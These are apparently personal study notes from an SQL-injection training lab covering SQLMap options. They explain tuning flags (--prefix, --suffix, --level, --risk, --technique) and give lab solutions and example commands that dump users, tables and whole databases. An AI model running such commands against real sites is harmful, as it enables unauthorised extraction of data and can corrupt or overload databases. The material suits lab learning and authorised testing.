SQLMap
Handling SQLMap Errors
we can use --parse-errors to parse the DBMS errors
-t option will store the whole traffic content to an output file
-v will give us verbose output. It uses a number system apparently to get the level of verbose
--proxy Will allow us to redirect the traffic through a proxy
Attack Tuning
We can use --prefix and --suffix to append to a test like the following example:
sqlmap -u "www.example.com/?q=test" --prefix="%'))" --suffix="-- -"--level goes from a rating of 1-5 the default is 1. the higher the level the less likely of success. So by default SQLMap tries the most successful attack vectors but you can extend it to include less likely of success vectors
--risk goes from 1-3 with the default being 1. it extends the risk level of causing problems at the target side i.e risk of DB entry loss or denial of service
you can check these when using them with -v level 3 or higher to get the values used in the payloads
it is generally not encouraged not to increase these because it increases the time significantly but you might have to for login pages or ones where OR is needed
--code can be used to detect differences between statuses example --code=400
--titles can look for the sublte difference in the changing of the title tag
--string can look for a specific string in the return such as --string=success
--text-only will remove all HTML tags and only look at the text
--technique allows us to custom define the SQLi technique we want to perform. Example --technique=BEU will only try Boolean based blind, error based, and union based
found the flag by modding the queries from yesterday
case 5:
sqlmap -r Case5.txt --threads 10 --dump -T flag5 --batch --level=3 --risk=3Case 6: non standard columns
sqlmap -r Case6.txt --threads 10 --dump -T flag6 --batch --prefix='`)'Note: no way in hell would I have found this without the hint
Case 7: union cols
sqlmap -r Case7.txt --threads 10 --dump -T flag7 --batch --union-cols=5Note: Hint said to count the cols so i did and added the tag. Still would have never tried this blindly
Database Enumeration
Basic Database Data Enumeration
--banner will give us the database version banner
--current-user will retrieve the current use
--current-db will tell us the current database
--is-dba will check if the current user has DBA rights
--tables -D databasename will retrieve all the tables of a database
if we want to retrieve data from a DB we can use --dump
sqlmap -u "http://www.galapagh0st.com/?id=1" --dump -T users -D exampleDatabaseThe above sqlmap command will dump all the data from the table users from exampleDatabase
If we want to only grab certain columns then we can do the following command.
sqlmap -u "http://www.galapagh0st.com/?id=1" --dump -T users -D exampleDB -C name,surnameto do the above but grab them by their ordinal numbers we can do the following
sqlmap -u "http://www.galapagh0st.com/?id=1" --dump -T users -D exampleDB --start=2 --stop=3We can do a conditional enumeration, essentially if we want to do a where like by doing the following:
sqlmap -u "http://www.galapagh0st.com/?id=1" --dump -T users -D exampleDB --where="name LIKE 'f%'"the above will look for all users where the name begins with an f
if you want to include all the contents of a DB you can do the following
sqlmap -u "http://www.galapagh0st.com/?id=1" --dump -D exampleDatabaseor if we want to grab data from all databases we can do the following
sqlmap -u "http://www.galapagh0st.com/?id=1" --dump-all --exclude-sysdbsNote this will also exclude the system DB stuff